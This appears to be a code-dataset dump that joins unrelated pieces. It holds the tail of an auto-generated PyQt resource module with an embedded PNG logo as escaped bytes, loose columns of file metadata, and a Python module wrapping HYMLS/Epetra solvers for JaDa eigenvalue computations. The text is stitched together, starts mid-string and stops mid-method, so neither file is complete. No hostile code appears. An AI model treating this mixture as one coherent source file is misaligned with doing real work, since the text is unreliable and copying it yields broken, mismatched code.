^\xc3e||\xd0p\xff\x03yv\x8c\xb7%b\xcd:\xd7\x13iX'\xe8\x07\xa5\x87%8\xdb\x1fI\x95\xdf\x94?\x95\x15\xe5\x0b\xe5\xbcrw[\x97\xdbvI\xf8T\xf8V\xf8Q\xf8N\xf8^\xf8\x19d\xe1\x92pY\xf8I\xb8\x22|#\x5c\x8c\x9d\xd5\xe3\xe7c\xf3\xec\x83z[\xd52M\xbb^S0\xa5\x8c\xb4[zI\xcaJ/H\xafH\xc5\xc8\x9f\xd4-\x0dIc\xd2\x1e\xd4\xec\xde<\xb7x\xbcx-\x06\x9c\xc0\xbd\xd5\xd5\xf6\xb18\xaf\x82Z\x03N\x05\x15xA\x87-8\xb3m\xfeCk\xd2K\x86Ha\xdb\xd4\x0e\xb3Yn1\xc4\x9c\x98\x15\xd3 \x8b{\xc5\x11qH\x1cg\xb8\x95\x9f\xb8\x07u#\xb8\xe7\xb6L\x9d\xfe\x98\x0ah\x8c\x15\xafs \x98:6\xab\xccz!\xd0y@}z\xdag\x17\xed\xa8\xed\x9cq\x8d\xd9\xba/\xefS\x94\xd7\xe54~\xaa\xa8\x5c\xb0\xf4\xc1~Y3M9Py\xb2K=\xea.\xd0\xea \xb0\xef \xbf\xa2\x1f\xa8\xc1\xf7-\xb1\xf3z$\xf3\xdf\x068\xf4\x17\xdeY7\x22\xd9t\x03\xe0k\x0f\xa0\xfb\xb5H\xd6\x87w\xe2\xb3\x9f\x01\x5c8\xa07\xdc\x85\xf0\xceO$~\x01\xf0j\xfb\xf7\xf1\x7f]\x19\xbc\x9bn5\x9b\x0f\xf0\xbe\xea\xf8\x04`\xe3\xe3f\xf3\x9f\xe5fs\xe3K\xf4\xbf\x06p\xc9\xfc\x17Y\x00qx\x94\x0a\xbf*\x00\x00\x00 cHRM\x00\x00z&\x00\x00\x80\x84\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00u0\x00\x00\xea`\x00\x00:\x98\x00\x00\x17p\x9c\xbaQ<\x00\x00\x00\x06bKGD\x00\xff\x00\xff\x00\xff\xa0\xbd\xa7\x93\x00\x00\x00\x09pHYs\x00\x00\x0b\x13\x00\x00\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x04\xadzTXtRaw profile type icc\x00\x00H\x89\x9dWk\xd2\xa4 \x0c\xfc\xcf)\xf6\x08<\x92\x80\xc7Q\xc0\xaa\xbd\xff\x05\xb6\xc3\xc3\xd1\x19\xddog\xad\xa2P\x08\x1d\xd2\x09!\x9a\xdf9\x9b_x\xdc\x22\xd6X}\xe2\x9a\xc4E\x1b\xadd\xeb}\x1b\x92\x225R\xf4\xec)\x12\xc68\xf1\xc2+\xe6bY0\x8d\x17\xa7\xfd\x86~\xd5\xde\x88\x93\x10C\xb4\xe4\xd8\xb2\xa5l\xc7s\x00\xff\xc3\xb3C\xab\xee\xc8\xcd\x81\x12|\xf9\x06\xe0\xfc\x98/\xe57!\xe1\x18$\xb4/gS\x1f\x96\xdd\x08\xe9\xb0\x94>\x11\xfb\x04K\x86\xc16\xfaH]\xae\xf6\xde\x86\x14#\x98\xb3c<\xba\xb1sG\x06t6\x1a\xfbD\xb0sB\xe2y\x9c\xe8\x18\xbf\xc8s:\x03\x11<\xd3\x11\xe2\xc1M\xc5.\xe1I\x19\x9a\xe3\x18\xf7Y\x1e\xe4\x0d4\xdf\x03\x9d\xb98\x1eG\x14\x85\xa5b\xce\xcb\x22\x01a1\xc2\xc30\x98\x90]\x04\xc3Y\xf8\x9e\xe1\xe7\xe5\xaf\xd5\xe6y\xf9w\xcf\x8f\xeeG\xac\xe5\xc8\x1f&\xd6\xf1\x92a\xfe\xc6\x81\xb6\x01\xe4;\xfbp\xbf\xa4\xe8)\xb1\xbf\x8e\xaf\x16\xe4;b\x1e\x80\xbe;\xc1\xe5\xa4\xa1@8H\x13H\x86\x22\xd5\xbe1\xd3\x88v\xdf\xdd\xec\x9d\x17\x81\x02a\xbe(\xf0!\xc7U\x12\xdc\x15\x07\x90\x93\x81G\xb2@\xc3\xc2t]\x00\xf1*\x9e*\xed\x17\xc5~\xf5\xb2\xc9N\xdb\xb1\xa3\x09\x94\x93\x1ea\x0a#\xe0f*\xf0\xa5\x22\xaa\x98\x96y\xa8\x07G0T\xc3\x84\x88x\x9a\xd6\x05\x82\xc3\x02\x04Vz3!\xd0\x8a\x0c! u\x8e\x1f;R\xd3(P\xbd\xee( *V\x90\xba\xce\x88p}g!%\x8d\x17D\xcf4\xad\x9b\x1e`\x1a\xce%\xc5\x17\xd9\xdd\x84\x90E\xbd\x80\xbct\xe5\x22\xd4\x04\x8e28\x9aG\xa5\xef\x94\xac\x06iPo\x9a\xf7\x05\x91\xd4\x0b\x94.\x9a)H\xcb\x96t\x84E\xef\x89W\x8dj\x12Z\xaeqD1kR{e\xca\xc1\x1d\xad\x80\x89\xcc\xfe\xe0n\x00\x15\xcd\xa4\x9e\x98\xe2uG\xb4\xab\xcd\x95_\x81\xd7\xc7\xd9%x\x07G\x8e\xb61\xde\xbd\xc6\xa1j\xf2\x02\xc5\x0e@z\xd6\x04\x9c\x88\x1f\xef\xeaT\x08\xec\xa5\xe5x\xab\xe6 \x97Y\xf2\xfd;j\xf3c\x0d\x14\x09.\x01\xc9\xa6\x0b5\x80\xda\xfb&\xb4 \x8d\x02H\xb6.\xf83\xa0\x99\x88\x10\xb4' y\x8d\xdf\x81\xc8IyM\xbaf\x02\x85\xef\x80\xceV\xd4\xe5\x0d\x08[$\xdcE\x9a,)\x84\xd1o\x96\xe0A\x0a\x05-\xa1u3)@\x96\xb4\xaf\xe8IeM\x9b\xd4\x05\x1f\x9a\xf9\x96\xd4\x97i\xba\x93\x8f\x1dE\xa7WB\xdf\xee\x04\x84[\x01\x08\xd6W\x9c\x80tgb\xf2\x08\xd2]\x93o\xdeM\xda\xf54<i\xd7\xef\x9f\xc8\xee\xbc^9z\x0a\x85v\xe1\xc9\x8d\xf9\xbe\xcc00\xef\xbb\xc8\xb8\xc3\xb6\xecnM)8;[\xe2\x5c\x82mr\xb6\x1d\xee\x1e\xc8\xe6\x7f#\xd92\xaeqF\x0c1\xe0\xf1n\xf0\xb2\xa0\xdd\xc7\x0b\x97\xad\xcd\xf5\x06\x00\xcd\xe5\x8d\xbb|\xe2\xa9\xcc\x1d-'N\xc2=\x0fO\xce\xc8\x038\x92\x02\x8d\x8f\xea\x06\xe0\xfe\x00\xf8h&rR5KK\xa7\x9f\x8b4644\x84\x91\xeb\xea.\x04\x15\xc9\xfb[\x0a\x82-\xd1\x04[\xe1\x84\x82\x04\xb4:4\x04{\xdd\xfe\x1e\xd5\xf71e>c\x06^\x0c\x0b\xda\xc6h\x05mA[\x91\xcf;P\xc8\xda\x1c\xc6v\xcd\xf1\xb8\x00\xd0oze\xdf\x9d\xb1\xef\xd3\x89\x99\x87\xee-\xc2\xa7\x9b/.~E\xfd\xa7g\xcd\x83'\xb8\x01U\x08U\xb7\xd9\xeaA\x1d\xd2Eu;\xde\xd9\xb6k\xe9\x0a\xd6M\xab\xc8C58\x08$\x08\xc6\xb1h\xfb<{O&\xb2\xd6G\xb7\xa7\x1e=\xcfw\xbe\x06\xedw\xa6\x9d\x01\xe7\x8e\x94\xcb\xf8rD\xcb\x08\x93K%;.\x7f=\x9c\xef\xda\x09\x95\x08\x81\x06\x14?\xe7\xf4kn\xf2o:r\xf5;\x88\xa0,\x10\xc8\x88zUuz-\xe5\x164\x5c\x90B\xeb1\xf1N\xa2\x80\xf8\xb6P\x85\xdb;?%\xbf\x91\x8f\xee=\xf1\xe0\x88[\xb0ye\xdf\xb9\xb5\xd8\xe3\x1a\x9f\xa9\xf6H\xbd\xf2Z\xd7\xe6\xd8D\xad\xf0\xd3\xf8I\xe9\x15\xcc\x8e\x1aii\xa5yD\xfd\x06\xcc\x80x\x0cZ\x85\xb5\x8bO\xeb\x15\x81FZP3\x05_}\x06yN\x0bv\xbc\xbc\x96\xc5\xd0\xbe\xf4\xf7\x01u~\x14T'\xa4\xb5\xc7\xf1\x07yz\xf6\xd0\xea\xa5V\x01\xb7\x1f?'y\xbf\x13D}\xdb~\xbfB\xa9\xa3\xf8,\xb7\x80\x8c\x9b\xaf\xd5Gk\xee\xffWN\xab\xb8\x1bA\x9fz-\xe9xi%\xe1\x96\x82\xa0\xfam;\x9e2\xf3\x17\xc2\xa1\x8ao\xda\xa3\xca\x84pFr6S\xff\xe6Rw}\xc2(\xc0\xe2\xd2\xc6\xf7\xb28\xd3&\xb6\xd5\xb7\xbe\xaca\x98\xd0J\xbe\xac\x05\xd4\x1f\xd7\xb5G\xdd\x00\xd6\xee\xb4\x00\x00\x09OIDATX\xc3\xadY\x7fp\x5cU\x15\xfe\xbe\xfb\xde\xbe\xa4m\xd2$\x0di(U\xdbBa\xe8$\xfc\xb0\x13\xec\x88c\xbao7KKD\xd4\x01V\x07g\x18\x81\xc1\xd1\x19\x11Etd:c\xa6\x8c\x83:\xfc\xe1\xf0\xeb\x9f\xe2\xa08:jD\x07['-i\x92\xcd\x84\x16\x01K\xa9\x94\x82\x96b\xb5\xc4&%\xdd\x96\xfe\x08I6\xef\xdd\xcf?v\xb7lC\xf6G\xda\x9e\x997\x9b\xec\xbb\xf7\x9c\xf3\x9ds\xef9\xdf\xbdKI\xa8DH2\x1a\x8d6\xba\xae\xdbd\xadm\x92T\x03\x80\x00\x5c\x92\x19I4\xc6\x9c\x02\x90v\x1c\xe7h]]]\xba\xbb\xbb;\xacH\xf9\x1c$\x1e\x8f/\x05\xd0\x22i\x1d\xc9\x1b\x01\xac*x=\x05i\x8f\x80\xe7\x8d1;\x8c1\xfbz{{\x0f\x9f\x85\xa3\x14\xe0\xb6\xb6\xb6\xc8\xc2\x85\x0b\xdbI\xde\x04\xe9\xd3 \x97\x03\xa8\x03P\xcdl\x14\xb2\x03s:\x947\x0a\x9c\xa2\xf4\x1f\x91/Iz6\x95J\x0d\xa9\xd2\xc8\xce\x22\x89D\xa2\xceZ{3\x80\xaf\x00XC\xa0\x11$fSy\xc6/\x09\x02\xd2\x00vKz\xceu\xdd\xe7z{{\x0f\x17\x05\x1c\x8f\xc7?\x0f`\x03\x805\xcc\x01\x9b\x8b\xcf\xf99\x00\xac\xa4\xe7%=800\xf0\x8f\xb9\x00M&\x93^:\x9d\xbe\x9b\xe4w\x00\x5c1W\x1f\x0a\xfd\x90t\x04\xc0\xd6\x8f\x00nmm\xf5\x9a\x9b\x9b\x1f\x06p?I\x9eGb\xce6*\xa5\xadt\xf7\xc0\xc0\xc0_*\x99\xb3v\xed\xdaU\xae\xeb>A2v.@\x8b\xf9q\x16\xa0d2\xe9\x1d;v\xecq\x00_\xbf\x10\x06>b\x108m\xa5/\xa7R\xa9\xad\xc5\x96\xb8\xef\xfb\xae1\xe6F\x00\x9bH^|\xa1\xfd0\x85\xff\xa4\xd3\xe9\xdb+\x05K $\x19\x90\x0cpf\xfb\x96\x9dTC\xf2\xd1D\x22\xb1d\xd6\xd7\xa4\x01\xb0\x1e\xc03\x04.8X\x00p\xf3\x7f\xf8\xbe_c\xc8\xef\x95\xf5\x99\xb4\x92\xc6@\xee\x91t\x1c@5\x80\xcb\x01\x5c\x0a`^\xa9\xb9\x12@re\x10\x04\xf7\x91\xfc\xe1\xcc,G\xa3\xd1\xab\x8d1\xbf \xd00\x07\xa8\x22`\x01\x08\x1f\xd6\x0d#\x89\xc8\xd5\xb0Y\x01\x1bcV\x03h)e(\xb7\x17_5\xc6\xdc\xbd}\xfb\xf6\xbd\xf9\xef\xd7\xaf_\xbf(\x93\xc9\xdcJ\xf2!\x02\xcdEt\x88\xa4r\x9fwutt<\x09\xe0\xd0Y\x017\xe6Q\x92\xcd\x15\xad\xb0l+\x9c\x06\xf0?+\x1d\x82A\x1aV Y\x05\xa0\x19\xc0\x12\x00M$]\x00\xae$\xe7,\xc0\x00\xae\xae\xa4HY\xe9\xa7\x03\x05`\x01`\xdb\xb6m\xc7\x00l\x8a\xc7\xe3\x96\xc6<\x01I\x90\x04\xc2f\xbb\x03\xc6\x01\x9c\xb0\xd6\x9e4@\x9a\xc6\x1c\x05\xd0X\x08\x98\xe4\x1d$\xdb\xcb\xd9'\x19J:\x0a\xe0O$\x9f\x05\xf0z\xfb\xc0\xc0\xf1.\xc9\xe6\xc7$\x93Iott\xb4\xd1\xf3\xbc\x95\x00>\x0bk\x134f5\x81\xea3\x80%5\x15\xb4\x92\x229\x12H6\xb6\xb6\xb6z\xfb\xf6\xed\x9b\x9e\xb9$\xa7\xa6\xa6\xfe\xe0y\xde\xc7\x01\x8cK:b\x8cy\x0f\xc0\x91\x1c\xd8\x13MMM'\xbb\xbb\xbb33\xd5\xfa\xbe_o\x8c\xf96\xca\x82\xc5\xb4\xa4\xed$\x1f\xec\xeb\xeb{\xbd\xd8\xb8\x9c\x8d\x91\xdc\xf3B[[\xdb#\xb5\xb5\xb5k\x8c1\xb7\x9c\xc9h<\x1e\xdf@\xf2\xc7\x15DxD\xd2\xc3\x92R\x8e\xe3\x0c\xcf\x9b7o\xfa\xd4\xa9Svll\xcc655\xd9\xc1\xc1A\xab\x82hW\x22\xf1x\xfc6\x92\xdd\xa5l\x93\xb4\xd6\xda\xdfe2\x99o\xee\xd8\xb1\xe3\xd4\x5c\xf4\x17Ja\x86\x0f\x96\xcdpv\xdc\x12\x02\x8f\x83<a\xad}g||\xfc\xdf\xc6\x98w\x9a\x9b\x9b\x87%\xbd\x1b\x8b\xc5\xde\xbd\xe1\x86\x1bFI\x9ep\x1c'\xa8\xa9\xa9\x09*\xa0\x987\x97\x0c2\x00\xc0\xbe\x22\xe9[\xe7\x03\x16(\xa0\x96\x89D\xe2Rk\xed\xdf\x01,\xaaxr6\xf4\x85\xc1\x00\x80I\x00GH\x1e\x94\xb4\x8b\xe4\xcb$wOLL\x8c\xed\xdc\xb9\xf3\xf4\xccm\x90+V{\x08\x5cV,\xbf$\xa7B\x867\xa5\xb6\xa7\xfa\xce\x07,P\xd0\x87\xfb\xfa\xfa\x0e\x02\xf8\xb3!+^\x8e\xca\x81\xcc?9\xa9\x06\xb0\x0c@\x94\xe4\x03\x92\xba%\xfd\xd5\xf3\xbc\x07\xda\xdb\xdbW&\x93Io\x06\x98\xa5\x00\x96\x94\x00\x0bI{\xc6F\xc6\x86\xce\x17\xecY\x80%\x89\xe4#V:\x80J\x89D\xa9`|\x18\x04BZe\x8c\xf9\x91\xeb\xba\x7f<z\xf4h\xa2\xb3\xb3\xb3\xaa`\x5c\x13\xcb\xf4o\x00/\xbd\xf1\xc6\x1b\x19\x5c\x00)lK\xe8\xeb\xeb\xdb\xef\xfb\xfe}\x8e\xc3M\x10\x97h\xc6\xfbs\x06\x9fE\x06\x92\xd7\x00\xf8efb\xe2\xae\x8d\x1b7\xf6tuuYcLm.\x8d\xa5\x82w\xb8\x12;$M4\x1a\x9d_1`\x00H\xa5R\xdb\xe2\xf1\xf8\xd7\x00<D\xb2\x05\xc0|I\x1e.\x80(\x0b\xba\x09\x8e\xf3\xd8\xd0\xd0\xd0[\x00\xde\x91d\xcb\x95JVRM\x01D\xa3\xd1E\x8e\xe3\xdcea\x1d\x14\xd9\x98\xb3f\xb0\xbf\xbf\x7f\xa0\xbd\xbd}o$\x12\xb9\x95\xe4\xe7\x00\xb4\x90\xac\x05P\x9d\x03\xefb\x16\xda6\x07\xd0+\x00\xdcK\xf2\xbb\xbe\xef\xbf\x0f\xd2B2%\xa6-\xafP\xfd\xc5\x92~fhf\x9c\x12\x0a\x82W\xae\xef\xb6\xb5\xb5E\xea\xeb\xeb/G\x18~R\xc6\xb4I\xba\xd2\x90\xcb@.\x22\xe5I\x8c\x00\xf0$E\xe6\x12\x04I\xc3\x8e\xe3\xb4\x06A\xd0@\xf2\xf5\x5c@?\xea \x00+\xed\xa9\xa9\xa9\xf9\xcc\xe6\xcd\x9b?(\xa53\x16\x8b\xb5\x90|\x15@U\xb11e\xf7\xe8\xae]\xbb\xa6\x01\xbc\x99{~\xeb\xfb\xbe\x9b\x09\x82&\xc7q\x96\x1acV\x00\xbaL\xd2\xe5\xb9\xac-\x01\xb0\x14@m9\xbd\xc6\x98K\xac\xb5\xd7\x00x\x91\xe4\xdb$W\xcf\x16|\x010\xe4U\xe3\xe3\xe3I\x92\xbf\x9e+\xa9\xa9\x08\xf0\xc6\x8d\x1b\xcd\x96-[\x1c\xcf\xf3\xdc\x05\x0b\x16xA\x10D\x22\x91\x887==\xed\xcd\x9b7o\xa4\xa7\xa7'O\xdbv\x01@2\x99tFGG\x17{\x9e\xd7*\xe96\x92_\x954\xbf\x8cmCrq*\x95\x0a:b\xb1\x1d W\x97\x18\xeb\x00\xb8?\x1e\x8f\xef&\xb9\xf7|\xae\x8b\x5c\x00\xf0}\x7f\xb9\xe38^\x18\x86\x9e\xeb\xba\x910\x0c\x17\xd6\xd7\xd6\xd6\x86@\x9d\xb5\xb6\xc1!\x1b\xac\xb5\xf5\x8e\xe34NNN>\x05`g\xa1\x92\x1c\x93\x1a\x010\x92H$^\xb1\xd6^K\xf2\xba\xb2\x07\x11k-\x00X`3\xa5{P\xa4=\x09\x00\xc9\xab$\xfd$\x1a\x8dn\xf0}\xff\x9f\xa9Tj\xf2\x9c\x01\x1bc\xbe\xa1l\xaf\xbc\xc8Z[o\x0cj%S\xeb\x00\xf3\x05D\xf2\x17C$@\xd2\xeb\xec\xec\xdc\xdb\xd3\xd3sr6\x85\x0d\x0d\x0d\x13\xe9tz\xb4\x9caI\x811f\x04\x00\x22\x91\xc8K\xd3\xd3\xd3/\x1bc\xa2\xc5\x82\x94+v\x9dN\xb6\x8d=\x96H$v\x07A\xf0\xde\xe0\xe0\xe0\x07\xf9e\xee8N>\x86E\x85\x92\xd0\x11\x8b=D\xc7\xd9 Y#e\x0bE\x09\xe6\xf3\x01\x10\xdeoLd\x8b\xeb\xba\xe9\xad[\xb7N\x03@4\x1a5\x8e\xe3\xd4Yk\xdb\x0c\xf9\xb4\x80K\x8a\x1a\xcd\x228\x98\x09\x825CCCc\x00\x10\x8b\xc5n1\xc6<-iaI\x87\xb3\xcc\xeb}\x03l\xb5\xc0\x80\xa4\xb7$\x9d\x00\x10\x18c>\x01`\x0b\x80\xa2m\x94\x92\xe0\xfb\xfe\xc7\x1cr\x08\x86+\xca\xed\x8e\x5c\xaa\x8f\x01\xf8\x15\x80\x17\x00\xa4\xad\xb5VR\xad1\xe6Z\x12wB\xb8\xa2\xdcE\x82\xb5\xf6\xc9T*uo~?vvvVe&'7\xc1\x98\xdb%\x95-\xa69\xe0\x01\x80\xc3\x00\x86\x09\x8c\x0b\xa8\x01\xf0)d\xf7|q\xc0\x00\x10\x8f\xc7\xbb\x08l\x10\x10)g,\x0f\x5c\xc0I\x00\xc7s\xd7>\xb5\x00.*\xb5:\x0a\xe6\x0d\x03\xf8B\x7f\x7f\xff\xee\xc2w\xbe\xef\xaf4\xc6<CrM\xfe\x86\xa2\x12?f9\xc0\x14\x953\xed\xd9q\x9c\xa7\x04\xfc\x8ddE\xbf\x16\xe4\xd4.$\xb0\x0c\xd2\x0a\x00\x17\x15|_\xdcA\x83\xe3\x00\x9e\x9c\x09\x16\x00R\xa9\xd4\x01\x00\xdf\x07\xb0\x1b@P\xa9\x1f\xb3\x1c`\xca\x03\xee\xed\xed=L\xf2\x1e\x0b\xfb\x1b\x00\xa7+e\x10\xaa\x04d\xfe\x93|\xcdZ\xfc\xa0\xaa\xaa\xea\xe7\xc5\xc6\xf6\xf7\xf7\xbf\x18\x86\xe1\x1d\x00\x1egv\xa9^0!faZ\x1d\x1d\x1dWH\xba\x93\xe4\x8d\x90\xaeD\x8e\xb5\x9cK\xe3\xcb/o\x92\x87$\xed\x94\xf4\xfb\xea\xea\xea\xe7{zz\xa6\xca\xcdmoo_\x12\x89D\xbeH\xf2K\x92\xae#P\x7f\x9e~L\x0188+\xb5\xec\xe8\xe8h\x94\xd4\x0e\xe0z\x92-\xfap\xc9\xd6\x92\x8c(\xc7{\x0b\xa3_\xa0%\x040\xc9la\x1b\xb6\xd6\xee7\xc6\xbc`\xad\xdd100\xf0\xaf\xb98\xda\xda\xda\xea-^\xbc\xf8:c\xccZ\x00\xd7KjA\x96\xcdUU\xa8b\x8a\xe4{\x82\xde\x86\xf0\x1a\xc9]%\xb9tGGG\xa3\xb5v\xa51f\xb9\xb5\xf6\x12\x92\x8b\x91\x8d\xf4\x02\x92\xf9CDV\xac\x0d`\xccT\xaeE\xa4i\xed\xb0%\x87\xc30\xdc\x1f\x8b\xc5\xfe\xdb\xd5\xd5u\xce\x94p\xdd\xbau\x0b2\x99\xcc*cL\xab\xa4U$\x97\x13\xb8R\xd9\xfb\xf0\x99d\xe5}\x92\x07 \x1d\xb0\xd2!#\xed\x87\xe3\xec\x07\xf0f___\xba\xe2\xdf\x8e\x92\xc9\xa4s\xfa\xf4iwbb\x22\x12\x04A\xc4u]'\x0c\xc33I\xf6<\xcf\x86a\x18z\x9e7\x9dN\xa739\x0e~\xc1\xc5\xf7\xfdj\x005$\x1b\xe5\xa8\xc1\x85\xeb\x22\xc8\xd57\xd7\x85\xa4\xa90\x0c\x8f;\x8es<\x0c\xc3\xf1\xc1\xc1\xc1\xa9B*\xfa\x7fv%\xa5K\xb6.\xe84\x00\x00\x00%tEXtdate:create\x002017-03-14T16:16:23-07:00&X7\x8a\x00\x00\x00%tEXtdate:modify\x002017-03-14T16:16:23-07:00W\x05\x8f6\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = "\x00%\x02\xa3\x13$\x00t\x00k\x00_\x00f\x00r\x00a\x00m\x00e\x00w\x00o\x00r\x00k\x00_\x00q\x00t\x00w\x00i\x00d\x00g\x00e\x00t\x00s\x00.\x00o\x00v\x00e\x00r\x00l\x00a\x00y\x00_\x00w\x00i\x00d\x00g\x00e\x00t\x00\x0b\x05U\xfb'\x00s\x00g\x00_\x00l\x00o\x00g\x00o\x00.\x00p\x00n\x00g"
qt_resource_struct = "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00P\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 712.571429
| 14,017
| 0.742582
| 3,374
| 14,964
| 3.280676
| 0.271488
| 0.030897
| 0.021953
| 0.010841
| 0.02909
| 0.026922
| 0.018159
| 0.018159
| 0.01572
| 0.01572
| 0
| 0.250034
| 0.006816
| 14,964
| 20
| 14,018
| 748.2
| 0.494752
| 0.009957
| 0
| 0
| 0
| 0.333333
| 0.974946
| 0.97184
| 0
| 0
| 0.00054
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bd6c13b26deb1be96fcbba65c0d6cec0c11c4e64
| 8,265
|
py
|
Python
|
fvm/JadaHYMLSInterface.py
|
erik808/fvm
|
4d10d83dccb2d8ee3f8b2550a39e3179a64b7cb9
|
[
"Apache-2.0"
] | null | null | null |
fvm/JadaHYMLSInterface.py
|
erik808/fvm
|
4d10d83dccb2d8ee3f8b2550a39e3179a64b7cb9
|
[
"Apache-2.0"
] | null | null | null |
fvm/JadaHYMLSInterface.py
|
erik808/fvm
|
4d10d83dccb2d8ee3f8b2550a39e3179a64b7cb9
|
[
"Apache-2.0"
] | null | null | null |
import copy
import HYMLS
from PyTrilinos import Epetra
from jadapy import EpetraInterface
from jadapy import ComplexEpetraInterface
class JadaHYMLSPrecOp(EpetraInterface.Operator):
def __init__(self, op, prec):
super().__init__(op)
self.prec = prec
def ApplyInverse(self, x, y):
self.prec.ApplyInverse(x, y)
# Create a view here because this is an Epetra.MultiVector.
z = EpetraInterface.Vector(Epetra.View, y, 0, y.NumVectors())
z = self.op.proj(z)
return y.Update(1.0, z, 0.0)
class JadaHYMLSInterface(EpetraInterface.EpetraInterface):
def __init__(self, interface, *args, **kwargs):
super().__init__(interface.map)
self.interface = interface
self.parameters = copy.copy(interface.parameters)
self.preconditioned_solve = kwargs.get('preconditioned_solve', False)
def solve(self, op, rhs, tol, maxit):
solver_parameters = self.parameters.sublist('Solver')
iterative_solver_parameters = solver_parameters.sublist('Iterative Solver')
iterative_solver_parameters.set('Convergence Tolerance', tol if maxit > 1 else 1e-3)
# iterative_solver_parameters.set('Maximum Iterations', maxit)
if rhs.shape[1] == 2:
solver_parameters.set('Complex', True)
else:
solver_parameters.set('Complex', False)
out = EpetraInterface.Vector(rhs)
epetra_op = EpetraInterface.Operator(op)
if self.preconditioned_solve:
epetra_precop = JadaHYMLSPrecOp(op, self.interface.preconditioner)
solver = HYMLS.Solver(epetra_op, epetra_precop, self.parameters)
else:
solver = HYMLS.Solver(epetra_op, epetra_op, self.parameters)
solver.ApplyInverse(rhs, out)
return out
def prec(self, x, *args):
out = EpetraInterface.Vector(x)
self.interface.preconditioner.ApplyInverse(x, out)
return out
class ComplexJadaHYMLSPrecOp(EpetraInterface.Operator):
def __init__(self, op, prec):
super().__init__(op)
self.prec = prec
def ApplyInverse(self, x, y):
self.prec.ApplyInverse(x, y)
assert x.NumVectors() == 2
# Create a view here because this is an Epetra.MultiVector.
y = EpetraInterface.Vector(Epetra.View, y, 0, y.NumVectors())
y = ComplexEpetraInterface.ComplexVector(y[:, 0], y[:, 1])
z = self.op.proj(y)
y *= 0.0
y += z
return 0
class ComplexJadaHYMLSInterface(ComplexEpetraInterface.ComplexEpetraInterface):
def __init__(self, interface, *args, **kwargs):
super().__init__(interface.map)
self.interface = interface
self.parameters = copy.copy(interface.parameters)
self.preconditioned_solve = kwargs.get('preconditioned_solve', False)
def solve(self, op, rhs, tol, maxit):
solver_parameters = self.parameters.sublist('Solver')
iterative_solver_parameters = solver_parameters.sublist('Iterative Solver')
iterative_solver_parameters.set('Convergence Tolerance', tol if maxit > 1 else 1e-3)
# iterative_solver_parameters.set('Maximum Iterations', maxit)
solver_parameters.set('Complex', True)
x = EpetraInterface.Vector(rhs.real.Map(), 2)
y = EpetraInterface.Vector(rhs.real.Map(), 2)
x[:, 0] = rhs.real
x[:, 1] = rhs.imag
epetra_op = ComplexEpetraInterface.Operator(op)
if self.preconditioned_solve:
epetra_precop = ComplexJadaHYMLSPrecOp(op, self.interface.preconditioner)
solver = HYMLS.Solver(epetra_op, epetra_precop, self.parameters)
else:
solver = HYMLS.Solver(epetra_op, epetra_op, self.parameters)
solver.ApplyInverse(x, y)
out = ComplexEpetraInterface.ComplexVector(y[:, 0], y[:, 1])
return out
def prec(self, x, *args):
y = EpetraInterface.Vector(x.real.Map(), 2)
z = EpetraInterface.Vector(x.real.Map(), 2)
y[:, 0] = x.real
y[:, 1] = x.imag
self.interface.preconditioner.ApplyInverse(y, z)
out = ComplexEpetraInterface.ComplexVector(z[:, 0], z[:, 1])
return out
class ShiftedOperator(object):
def __init__(self, op):
self.A = op.A
self.B = op.B
self.prec = op.prec
self.Q = op.Q
self.Z = op.Z
self.Y = op.Y
self.H = op.H
self.alpha = op.alpha
self.beta = op.beta
self.dtype = self.Q.dtype
self.shape = self.A.shape
def matvec(self, x):
return (self.A @ x) * self.beta - (self.B @ x) * self.alpha
class BorderedJadaHYMLSInterface(EpetraInterface.EpetraInterface):
def __init__(self, interface, *args, **kwargs):
super().__init__(interface.map)
self.interface = interface
self.parameters = copy.copy(interface.parameters)
self.preconditioned_solve = kwargs.get('preconditioned_solve', True)
def solve(self, op, rhs, tol, maxit):
solver_parameters = self.parameters.sublist('Solver')
iterative_solver_parameters = solver_parameters.sublist('Iterative Solver')
iterative_solver_parameters.set('Convergence Tolerance', tol if maxit > 1 else 1e-3)
# iterative_solver_parameters.set('Maximum Iterations', maxit)
if rhs.shape[1] == 2:
solver_parameters.set('Complex', True)
else:
solver_parameters.set('Complex', False)
solver_parameters.set('Use Bordering', True)
out = EpetraInterface.Vector(rhs)
epetra_op = EpetraInterface.Operator(ShiftedOperator(op))
if self.preconditioned_solve:
solver = HYMLS.Solver(epetra_op, self.interface.preconditioner, self.parameters)
solver.SetBorder(op.Z, op.Q)
self.interface.preconditioner.Compute()
solver.ApplyInverse(rhs, out)
solver.UnsetBorder()
else:
raise Exception('Not implemented')
return out
def prec(self, x, *args):
out = EpetraInterface.Vector(x)
self.interface.preconditioner.ApplyInverse(x, out)
return out
class ComplexBorderedJadaHYMLSInterface(ComplexEpetraInterface.ComplexEpetraInterface):
def __init__(self, interface, *args, **kwargs):
super().__init__(interface.map)
self.interface = interface
self.parameters = copy.copy(interface.parameters)
self.preconditioned_solve = kwargs.get('preconditioned_solve', True)
def solve(self, op, rhs, tol, maxit):
solver_parameters = self.parameters.sublist('Solver')
iterative_solver_parameters = solver_parameters.sublist('Iterative Solver')
iterative_solver_parameters.set('Convergence Tolerance', tol if maxit > 1 else 1e-3)
# iterative_solver_parameters.set('Maximum Iterations', maxit)
solver_parameters.set('Complex', True)
solver_parameters.set('Use Bordering', True)
x = EpetraInterface.Vector(rhs.real.Map(), 2)
y = EpetraInterface.Vector(rhs.real.Map(), 2)
x[:, 0] = rhs.real
x[:, 1] = rhs.imag
m = op.Q.real.NumVectors()
Q = EpetraInterface.Vector(rhs.real.Map(), m * 2)
